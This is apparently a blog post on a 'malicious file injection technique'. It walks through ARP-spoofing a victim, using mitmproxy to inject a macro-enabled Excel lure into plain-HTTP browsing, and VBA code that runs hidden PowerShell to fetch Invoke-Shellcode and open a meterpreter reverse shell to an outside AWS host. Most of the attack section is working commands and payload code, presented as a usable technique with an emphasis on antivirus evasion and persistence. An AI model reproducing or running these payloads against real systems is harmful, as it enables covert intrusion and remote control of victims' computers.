Malicious File Injection Technique

The idea with this particular attack is to inject a malicious file into the victim’s packet stream when they visit a non-https webpage.  For example, the default website for Internet Explorer is http://www.msn.com. So, when the victim opens their web browser, we can (after a successful MiTM attack) inject our malicious file in hopes that they will run it.

Local LAN attack box: 172.17.130.53 (Kali Linux)
Local LAN victim: 172.17.130.75 (Windows 7 with IE 11, fully patched)
Public AWS server: 52.37.49.217
Internal AWS LAN IP: 172.31.18.189

Ideally, we want to remain undetected by  AV, so we’ve embedded our malicious code with a macro-enabled Excel document.  If/When the victim runs the file and clicks to enable macros when prompted, a Powershell command is executed that downloads Invoke-Shellcode (written by Matt Graber) and runs it entirely within memory so as to continue to remain undetected by AV.

First, we need to craft our malicious Excel document.  This is covered in a separate post, but the basic VBA code looks like this:

Private Sub Auto_Open()
strCommand = “powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ‘);invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.37.49.217 -Lport 8443”
Set WshShell = CreateObject(“WScript.Shell”)
Set WshShellExec = WshShell.Exec(strCommand)
End Sub

We also need a place to host our malicious file, which we’ve is seen below:

Capture4

Next, we setup our metasploit listener, which is being done on an AWS box:

./msfconsole -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run”

Capture8

AWS NAT rules to forward incoming 8443 traffic:

Capture4

We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:

Capture

After running the following three commands on our local attack box, we’ll have successfully implemented our MiTM attack:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP

Below is what we’ll see, on our local attack box:

Capture0

If we look again at the victim PC, we can see the change to the ARP tables:

Capture2

Once the MiTM attack is fully in place, we can now execute the following two commands on our local attack box to proxy all traffic on port  80 to port 8080:

iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080

./mitmproxy -T -s “iframe_injector.py http://aws.shellgam3.com/files/2016%20Employee%20Salaries.xlsm”

The first argument runs mitmproxy in transparent proxy mode so that we can view incoming traffic on port 8080.  The second argument runs a script that injects our macro-enabled Excel document into the victim’s web browser, hosted at AWS.

Capture5

When the victim visits any non-http site (like MSN.com), they should see something similar within their browser:

Capture6

Within the mitmproxy console, we should see the injection:

Capture7

When the file is opened by the victim, we should (hopefully) have our reverse shell.  Even when the victim closes Excel, the shell should persist.

Capture3

 

 

Advertisements

2 thoughts on “Malicious File Injection Technique

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s